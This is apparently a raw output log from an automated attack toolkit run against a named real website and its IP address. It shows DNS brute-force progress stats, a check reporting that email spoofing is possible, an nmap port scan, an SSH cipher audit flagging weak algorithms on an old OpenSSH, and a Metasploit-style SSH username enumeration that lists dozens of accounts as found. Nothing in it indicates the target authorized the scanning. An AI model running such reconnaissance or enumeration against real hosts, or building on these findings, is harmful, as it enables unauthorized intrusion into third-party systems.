1479Mismatched domains: 309 (10.54%), IDs: 0 (0.00%)
1480Failures: 0: 35.66%, 1: 31.44%, 2: 15.43%, 3: 7.92%, 4: 5.01%, 5: 2.24%, 6: 1.15%, 7: 0.57%, 8: 0.31%, 9: 0.10%, 10: 0.05%, 11: 0.10%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.05%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1481Response: | Success: | Total:
1482OK: | 171 ( 8.92%) | 176 ( 6.00%)
1483NXDOMAIN: | 1696 ( 88.43%) | 1938 ( 66.10%)
1484SERVFAIL: | 51 ( 2.66%) | 59 ( 2.01%)
1485REFUSED: | 0 ( 0.00%) | 758 ( 25.85%)
1486FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1487
1488
1489
1490Processed queries: 1919
1491Received packets: 2953
1492Progress: 100.00% (00 h 00 min 14 sec / 00 h 00 min 14 sec)
1493Current incoming rate: 2 pps, average: 210 pps
1494Current success rate: 0 pps, average: 136 pps
1495Finished total: 1918, success: 1918 (100.00%)
1496Mismatched domains: 312 (10.63%), IDs: 0 (0.00%)
1497Failures: 0: 35.66%, 1: 31.44%, 2: 15.43%, 3: 7.92%, 4: 5.01%, 5: 2.24%, 6: 1.15%, 7: 0.57%, 8: 0.31%, 9: 0.10%, 10: 0.05%, 11: 0.10%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.05%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1498Response: | Success: | Total:
1499OK: | 171 ( 8.92%) | 176 ( 6.00%)
1500NXDOMAIN: | 1696 ( 88.43%) | 1939 ( 66.06%)
1501SERVFAIL: | 51 ( 2.66%) | 59 ( 2.01%)
1502REFUSED: | 0 ( 0.00%) | 760 ( 25.89%)
1503FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1504
1505
1506
1507Processed queries: 1919
1508Received packets: 2956
1509Progress: 100.00% (00 h 00 min 15 sec / 00 h 00 min 15 sec)
1510Current incoming rate: 2 pps, average: 196 pps
1511Current success rate: 0 pps, average: 127 pps
1512Finished total: 1918, success: 1918 (100.00%)
1513Mismatched domains: 315 (10.72%), IDs: 0 (0.00%)
1514Failures: 0: 35.66%, 1: 31.44%, 2: 15.43%, 3: 7.92%, 4: 5.01%, 5: 2.24%, 6: 1.15%, 7: 0.57%, 8: 0.31%, 9: 0.10%, 10: 0.05%, 11: 0.10%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.05%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1515Response: | Success: | Total:
1516OK: | 171 ( 8.92%) | 176 ( 5.99%)
1517NXDOMAIN: | 1696 ( 88.43%) | 1940 ( 66.03%)
1518SERVFAIL: | 51 ( 2.66%) | 59 ( 2.01%)
1519REFUSED: | 0 ( 0.00%) | 762 ( 25.94%)
1520FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1521
1522
1523
1524Processed queries: 1919
1525Received packets: 2957
1526Progress: 100.00% (00 h 00 min 16 sec / 00 h 00 min 16 sec)
1527Current incoming rate: 0 pps, average: 184 pps
1528Current success rate: 0 pps, average: 119 pps
1529Finished total: 1918, success: 1918 (100.00%)
1530Mismatched domains: 316 (10.75%), IDs: 0 (0.00%)
1531Failures: 0: 35.66%, 1: 31.44%, 2: 15.43%, 3: 7.92%, 4: 5.01%, 5: 2.24%, 6: 1.15%, 7: 0.57%, 8: 0.31%, 9: 0.10%, 10: 0.05%, 11: 0.10%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.05%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1532Response: | Success: | Total:
1533OK: | 171 ( 8.92%) | 176 ( 5.99%)
1534NXDOMAIN: | 1696 ( 88.43%) | 1940 ( 66.01%)
1535SERVFAIL: | 51 ( 2.66%) | 59 ( 2.01%)
1536REFUSED: | 0 ( 0.00%) | 763 ( 25.96%)
1537FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1538
1539
1540
1541Processed queries: 1919
1542Received packets: 2958
1543Progress: 100.00% (00 h 00 min 17 sec / 00 h 00 min 17 sec)
1544Current incoming rate: 0 pps, average: 173 pps
1545Current success rate: 0 pps, average: 112 pps
1546Finished total: 1918, success: 1918 (100.00%)
1547Mismatched domains: 317 (10.78%), IDs: 0 (0.00%)
1548Failures: 0: 35.66%, 1: 31.44%, 2: 15.43%, 3: 7.92%, 4: 5.01%, 5: 2.24%, 6: 1.15%, 7: 0.57%, 8: 0.31%, 9: 0.10%, 10: 0.05%, 11: 0.10%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.05%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1549Response: | Success: | Total:
1550OK: | 171 ( 8.92%) | 176 ( 5.99%)
1551NXDOMAIN: | 1696 ( 88.43%) | 1941 ( 66.02%)
1552SERVFAIL: | 51 ( 2.66%) | 59 ( 2.01%)
1553REFUSED: | 0 ( 0.00%) | 763 ( 25.95%)
1554FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1555
1556
1557
1558Processed queries: 1919
1559Received packets: 2959
1560Progress: 100.00% (00 h 00 min 18 sec / 00 h 00 min 18 sec)
1561Current incoming rate: 0 pps, average: 164 pps
1562Current success rate: 0 pps, average: 106 pps
1563Finished total: 1918, success: 1918 (100.00%)
1564Mismatched domains: 318 (10.81%), IDs: 0 (0.00%)
1565Failures: 0: 35.66%, 1: 31.44%, 2: 15.43%, 3: 7.92%, 4: 5.01%, 5: 2.24%, 6: 1.15%, 7: 0.57%, 8: 0.31%, 9: 0.10%, 10: 0.05%, 11: 0.10%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.05%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1566Response: | Success: | Total:
1567OK: | 171 ( 8.92%) | 176 ( 5.98%)
1568NXDOMAIN: | 1696 ( 88.43%) | 1941 ( 66.00%)
1569SERVFAIL: | 51 ( 2.66%) | 59 ( 2.01%)
1570REFUSED: | 0 ( 0.00%) | 764 ( 25.98%)
1571FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1572
1573
1574
1575Processed queries: 1919
1576Received packets: 2962
1577Progress: 100.00% (00 h 00 min 19 sec / 00 h 00 min 19 sec)
1578Current incoming rate: 2 pps, average: 155 pps
1579Current success rate: 0 pps, average: 100 pps
1580Finished total: 1918, success: 1918 (100.00%)
1581Mismatched domains: 321 (10.90%), IDs: 0 (0.00%)
1582Failures: 0: 35.66%, 1: 31.44%, 2: 15.43%, 3: 7.92%, 4: 5.01%, 5: 2.24%, 6: 1.15%, 7: 0.57%, 8: 0.31%, 9: 0.10%, 10: 0.05%, 11: 0.10%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.05%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1583Response: | Success: | Total:
1584OK: | 171 ( 8.92%) | 176 ( 5.98%)
1585NXDOMAIN: | 1696 ( 88.43%) | 1942 ( 65.96%)
1586SERVFAIL: | 51 ( 2.66%) | 60 ( 2.04%)
1587REFUSED: | 0 ( 0.00%) | 765 ( 25.99%)
1588FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1589
1590
1591
1592Processed queries: 1919
1593Received packets: 2962
1594Progress: 100.00% (00 h 00 min 20 sec / 00 h 00 min 20 sec)
1595Current incoming rate: 0 pps, average: 147 pps
1596Current success rate: 0 pps, average: 95 pps
1597Finished total: 1918, success: 1918 (100.00%)
1598Mismatched domains: 321 (10.90%), IDs: 0 (0.00%)
1599Failures: 0: 35.66%, 1: 31.44%, 2: 15.43%, 3: 7.92%, 4: 5.01%, 5: 2.24%, 6: 1.15%, 7: 0.57%, 8: 0.31%, 9: 0.10%, 10: 0.05%, 11: 0.10%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.05%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1600Response: | Success: | Total:
1601OK: | 171 ( 8.92%) | 176 ( 5.98%)
1602NXDOMAIN: | 1696 ( 88.43%) | 1942 ( 65.96%)
1603SERVFAIL: | 51 ( 2.66%) | 60 ( 2.04%)
1604REFUSED: | 0 ( 0.00%) | 765 ( 25.99%)
1605FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1606
1607
1608
1609Processed queries: 1919
1610Received packets: 2967
1611Progress: 100.00% (00 h 00 min 21 sec / 00 h 00 min 21 sec)
1612Current incoming rate: 4 pps, average: 141 pps
1613Current success rate: 0 pps, average: 91 pps
1614Finished total: 1918, success: 1918 (100.00%)
1615Mismatched domains: 326 (11.05%), IDs: 0 (0.00%)
1616Failures: 0: 35.66%, 1: 31.44%, 2: 15.43%, 3: 7.92%, 4: 5.01%, 5: 2.24%, 6: 1.15%, 7: 0.57%, 8: 0.31%, 9: 0.10%, 10: 0.05%, 11: 0.10%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.05%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1617Response: | Success: | Total:
1618OK: | 171 ( 8.92%) | 176 ( 5.97%)
1619NXDOMAIN: | 1696 ( 88.43%) | 1943 ( 65.89%)
1620SERVFAIL: | 51 ( 2.66%) | 62 ( 2.10%)
1621REFUSED: | 0 ( 0.00%) | 767 ( 26.01%)
1622FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1623
1624
1625
1626Processed queries: 1919
1627Received packets: 2973
1628Progress: 100.00% (00 h 00 min 22 sec / 00 h 00 min 22 sec)
1629Current incoming rate: 5 pps, average: 134 pps
1630Current success rate: 0 pps, average: 87 pps
1631Finished total: 1918, success: 1918 (100.00%)
1632Mismatched domains: 332 (11.24%), IDs: 0 (0.00%)
1633Failures: 0: 35.66%, 1: 31.44%, 2: 15.43%, 3: 7.92%, 4: 5.01%, 5: 2.24%, 6: 1.15%, 7: 0.57%, 8: 0.31%, 9: 0.10%, 10: 0.05%, 11: 0.10%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.05%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1634Response: | Success: | Total:
1635OK: | 171 ( 8.92%) | 176 ( 5.96%)
1636NXDOMAIN: | 1696 ( 88.43%) | 1945 ( 65.82%)
1637SERVFAIL: | 51 ( 2.66%) | 66 ( 2.23%)
1638REFUSED: | 0 ( 0.00%) | 767 ( 25.96%)
1639FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1640
1641
1642
1643Processed queries: 1919
1644Received packets: 2974
1645Progress: 100.00% (00 h 00 min 23 sec / 00 h 00 min 23 sec)
1646Current incoming rate: 0 pps, average: 129 pps
1647Current success rate: 0 pps, average: 83 pps
1648Finished total: 1918, success: 1918 (100.00%)
1649Mismatched domains: 333 (11.27%), IDs: 0 (0.00%)
1650Failures: 0: 35.66%, 1: 31.44%, 2: 15.43%, 3: 7.92%, 4: 5.01%, 5: 2.24%, 6: 1.15%, 7: 0.57%, 8: 0.31%, 9: 0.10%, 10: 0.05%, 11: 0.10%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.05%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1651Response: | Success: | Total:
1652OK: | 171 ( 8.92%) | 176 ( 5.95%)
1653NXDOMAIN: | 1696 ( 88.43%) | 1945 ( 65.80%)
1654SERVFAIL: | 51 ( 2.66%) | 66 ( 2.23%)
1655REFUSED: | 0 ( 0.00%) | 768 ( 25.98%)
1656FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1657
1658
1659
1660Processed queries: 1919
1661Received packets: 2977
1662Progress: 100.00% (00 h 00 min 24 sec / 00 h 00 min 24 sec)
1663Current incoming rate: 2 pps, average: 123 pps
1664Current success rate: 0 pps, average: 79 pps
1665Finished total: 1918, success: 1918 (100.00%)
1666Mismatched domains: 336 (11.36%), IDs: 0 (0.00%)
1667Failures: 0: 35.66%, 1: 31.44%, 2: 15.43%, 3: 7.92%, 4: 5.01%, 5: 2.24%, 6: 1.15%, 7: 0.57%, 8: 0.31%, 9: 0.10%, 10: 0.05%, 11: 0.10%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.05%, 48: 0.00%, 49: 0.00%, 50: 0.00%,
1668Response: | Success: | Total:
1669OK: | 171 ( 8.92%) | 176 ( 5.95%)
1670NXDOMAIN: | 1696 ( 88.43%) | 1946 ( 65.77%)
1671SERVFAIL: | 51 ( 2.66%) | 66 ( 2.23%)
1672REFUSED: | 0 ( 0.00%) | 770 ( 26.02%)
1673FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1674
1675
1676
1677Processed queries: 1919
1678Received packets: 2978
1679Progress: 100.00% (00 h 00 min 25 sec / 00 h 00 min 25 sec)
1680Current incoming rate: 0 pps, average: 118 pps
1681Current success rate: 0 pps, average: 76 pps
1682Finished total: 1918, success: 1918 (100.00%)
1683Mismatched domains: 337 (11.39%), IDs: 0 (0.00%)
1684Failures: 0: 35.66%, 1: 31.44%, 2: 15.43%, 3: 7.92%, 4: 5.01%, 5: 2.24%, 6: 1.15%, 7: 0.57%, 8: 0.31%, 9: 0.10%, 10: 0.05%, 11: 0.10%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.05%, 50: 0.00%,
1685Response: | Success: | Total:
1686OK: | 171 ( 8.92%) | 176 ( 5.95%)
1687NXDOMAIN: | 1696 ( 88.43%) | 1946 ( 65.74%)
1688SERVFAIL: | 51 ( 2.66%) | 66 ( 2.23%)
1689REFUSED: | 0 ( 0.00%) | 771 ( 26.05%)
1690FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1691
1692
1693
1694Processed queries: 1919
1695Received packets: 2978
1696Progress: 100.00% (00 h 00 min 25 sec / 00 h 00 min 25 sec)
1697Current incoming rate: 0 pps, average: 118 pps
1698Current success rate: 0 pps, average: 76 pps
1699Finished total: 1919, success: 1918 (99.95%)
1700Mismatched domains: 337 (11.39%), IDs: 0 (0.00%)
1701Failures: 0: 35.64%, 1: 31.42%, 2: 15.42%, 3: 7.92%, 4: 5.00%, 5: 2.24%, 6: 1.15%, 7: 0.57%, 8: 0.31%, 9: 0.10%, 10: 0.05%, 11: 0.10%, 12: 0.00%, 13: 0.00%, 14: 0.00%, 15: 0.00%, 16: 0.00%, 17: 0.00%, 18: 0.00%, 19: 0.00%, 20: 0.00%, 21: 0.00%, 22: 0.00%, 23: 0.00%, 24: 0.00%, 25: 0.00%, 26: 0.00%, 27: 0.00%, 28: 0.00%, 29: 0.00%, 30: 0.00%, 31: 0.00%, 32: 0.00%, 33: 0.00%, 34: 0.00%, 35: 0.00%, 36: 0.00%, 37: 0.00%, 38: 0.00%, 39: 0.00%, 40: 0.00%, 41: 0.00%, 42: 0.00%, 43: 0.00%, 44: 0.00%, 45: 0.00%, 46: 0.00%, 47: 0.00%, 48: 0.00%, 49: 0.00%, 50: 0.05%,
1702Response: | Success: | Total:
1703OK: | 171 ( 8.92%) | 176 ( 5.95%)
1704NXDOMAIN: | 1696 ( 88.43%) | 1946 ( 65.74%)
1705SERVFAIL: | 51 ( 2.66%) | 66 ( 2.23%)
1706REFUSED: | 0 ( 0.00%) | 771 ( 26.05%)
1707FORMERR: | 0 ( 0.00%) | 0 ( 0.00%)
1708www.javpetite.top
1709185.82.200.52
1710#######################################################################################################################################
1711[+] www.javpetite.top has no SPF record!
1712[*] No DMARC record found. Looking for organizational record
1713[+] No organizational DMARC record
1714[+] Spoofing possible for www.javpetite.top!
1715#######################################################################################################################################
1716Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-22 05:51 EDT
1717Nmap scan report for www.javpetite.top (185.82.200.52)
1718Host is up (0.22s latency).
1719rDNS record for 185.82.200.52: latina.petite.guru
1720Not shown: 996 closed ports
1721PORT STATE SERVICE
172222/tcp open ssh
172380/tcp open http
1724443/tcp open https
172510000/tcp open snet-sensor-mgmt
1726
1727Nmap done: 1 IP address (1 host up) scanned in 2.32 seconds
1728#######################################################################################################################################
1729# general
1730(gen) banner: SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u8
1731(gen) software: OpenSSH 6.7p1
1732(gen) compatibility: OpenSSH 6.5-6.9, Dropbear SSH 2013.62+
1733(gen) compression: enabled (zlib@openssh.com)
1734
1735# key exchange algorithms
1736(kex) curve25519-sha256@libssh.org -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62
1737(kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves
1738 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
1739(kex) ecdh-sha2-nistp384 -- [fail] using weak elliptic curves
1740 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
1741(kex) ecdh-sha2-nistp521 -- [fail] using weak elliptic curves
1742 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
1743(kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
1744 `- [info] available since OpenSSH 4.4
1745(kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
1746 `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
1747
1748# host-key algorithms
1749(key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
1750(key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
1751 `- [warn] using small 1024-bit modulus
1752 `- [warn] using weak random number generator could reveal the key
1753 `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
1754(key) ecdsa-sha2-nistp256 -- [fail] using weak elliptic curves
1755 `- [warn] using weak random number generator could reveal the key
1756 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
1757(key) ssh-ed25519 -- [info] available since OpenSSH 6.5
1758
1759# encryption algorithms (ciphers)
1760(enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
1761(enc) aes192-ctr -- [info] available since OpenSSH 3.7
1762(enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
1763(enc) aes128-gcm@openssh.com -- [info] available since OpenSSH 6.2
1764(enc) aes256-gcm@openssh.com -- [info] available since OpenSSH 6.2
1765(enc) chacha20-poly1305@openssh.com -- [info] available since OpenSSH 6.5
1766 `- [info] default cipher since OpenSSH 6.9.
1767
1768# message authentication code algorithms
1769(mac) umac-64-etm@openssh.com -- [warn] using small 64-bit tag size
1770 `- [info] available since OpenSSH 6.2
1771(mac) umac-128-etm@openssh.com -- [info] available since OpenSSH 6.2
1772(mac) hmac-sha2-256-etm@openssh.com -- [info] available since OpenSSH 6.2
1773(mac) hmac-sha2-512-etm@openssh.com -- [info] available since OpenSSH 6.2
1774(mac) hmac-sha1-etm@openssh.com -- [warn] using weak hashing algorithm
1775 `- [info] available since OpenSSH 6.2
1776(mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
1777 `- [warn] using small 64-bit tag size
1778 `- [info] available since OpenSSH 4.7
1779(mac) umac-128@openssh.com -- [warn] using encrypt-and-MAC mode
1780 `- [info] available since OpenSSH 6.2
1781(mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
1782 `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
1783(mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
1784 `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
1785(mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
1786 `- [warn] using weak hashing algorithm
1787 `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
1788
1789# algorithm recommendations (for OpenSSH 6.7)
1790(rec) -ecdh-sha2-nistp521 -- kex algorithm to remove
1791(rec) -ecdh-sha2-nistp384 -- kex algorithm to remove
1792(rec) -ecdh-sha2-nistp256 -- kex algorithm to remove
1793(rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
1794(rec) -ecdsa-sha2-nistp256 -- key algorithm to remove
1795(rec) -ssh-dss -- key algorithm to remove
1796(rec) -hmac-sha2-512 -- mac algorithm to remove
1797(rec) -umac-128@openssh.com -- mac algorithm to remove
1798(rec) -hmac-sha2-256 -- mac algorithm to remove
1799(rec) -umac-64@openssh.com -- mac algorithm to remove
1800(rec) -hmac-sha1 -- mac algorithm to remove
1801(rec) -hmac-sha1-etm@openssh.com -- mac algorithm to remove
1802(rec) -umac-64-etm@openssh.com -- mac algorithm to remove
1803#######################################################################################################################################
1804USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
1805RHOSTS => www.javpetite.top
1806RHOST => www.javpetite.top
1807[*] 185.82.200.52:22 - SSH - Using malformed packet technique
1808[*] 185.82.200.52:22 - SSH - Starting scan
1809[+] 185.82.200.52:22 - SSH - User 'admin' found
1810[+] 185.82.200.52:22 - SSH - User 'administrator' found
1811[+] 185.82.200.52:22 - SSH - User 'anonymous' found
1812[+] 185.82.200.52:22 - SSH - User 'backup' found
1813[+] 185.82.200.52:22 - SSH - User 'bee' found
1814[+] 185.82.200.52:22 - SSH - User 'ftp' found
1815[+] 185.82.200.52:22 - SSH - User 'guest' found
1816[+] 185.82.200.52:22 - SSH - User 'GUEST' found
1817[+] 185.82.200.52:22 - SSH - User 'info' found
1818[+] 185.82.200.52:22 - SSH - User 'mail' found
1819[+] 185.82.200.52:22 - SSH - User 'mailadmin' found
1820[+] 185.82.200.52:22 - SSH - User 'msfadmin' found
1821[+] 185.82.200.52:22 - SSH - User 'mysql' found
1822[+] 185.82.200.52:22 - SSH - User 'nobody' found
1823[+] 185.82.200.52:22 - SSH - User 'oracle' found
1824[+] 185.82.200.52:22 - SSH - User 'owaspbwa' found
1825[+] 185.82.200.52:22 - SSH - User 'postfix' found
1826[+] 185.82.200.52:22 - SSH - User 'postgres' found
1827[+] 185.82.200.52:22 - SSH - User 'private' found
1828[+] 185.82.200.52:22 - SSH - User 'proftpd' found
1829[+] 185.82.200.52:22 - SSH - User 'public' found
1830[+] 185.82.200.52:22 - SSH - User 'root' found
1831[+] 185.82.200.52:22 - SSH - User 'superadmin' found
1832[+] 185.82.200.52:22 - SSH - User 'support' found
1833[+] 185.82.200.52:22 - SSH - User 'sys' found
1834[+] 185.82.200.52:22 - SSH - User 'system' found
1835[+] 185.82.200.52:22 - SSH - User 'systemadmin' found
1836[+] 185.82.200.52:22 - SSH - User 'systemadministrator' found
1837[+] 185.82.200.52:22 - SSH - User 'test' found
1838[+] 185.82.200.52:22 - SSH - User 'tomcat' found
